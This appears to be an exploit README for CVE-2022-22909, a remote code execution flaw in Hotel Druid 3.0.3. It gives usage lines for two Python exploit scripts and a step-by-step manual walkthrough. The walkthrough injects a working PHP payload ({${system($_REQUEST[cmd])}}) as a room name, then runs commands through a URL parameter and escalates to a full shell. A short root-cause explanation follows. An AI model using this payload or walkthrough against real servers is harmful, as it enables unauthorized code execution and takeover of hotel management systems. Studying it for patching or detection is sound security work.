CVE-2022-22909 Hotel Druid 3.0.3 - Remote Code Execution (RCE)

Exploit by kaal

Exploits

1. HotelDruidExploit.py

This Exploit will create new room with our PHP payload as a room name .

Usage : $ ./HotelDruidExploit.py -h

$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid

---

2. HotelDruidExploitRoom.py

This Exploit will work if you already know the Room name .

Usage : $ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"

---

Exploit Walkthrough :

1). Navigate to Hotel Druid page.

2). Click on Tables -> Rooms

3). In Create New Room field add below php code , and click on Add.

{${system($_REQUEST[cmd])}}

4). You will see new room with our payload in the "Room" name field .

5). Go to below link and you will get command Execution , Later you can get Full shell

http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami

Note : Change the Ip with your hoteldruid target IP.

Vulnerability Description :

This vulnerability occurs because room names are getting stored inside /var/www/html/hoteldruid/dati/selectappartamenti.php

And selectappartamenti.php is a PHP file so any PHP code inside that file will get executed by the server.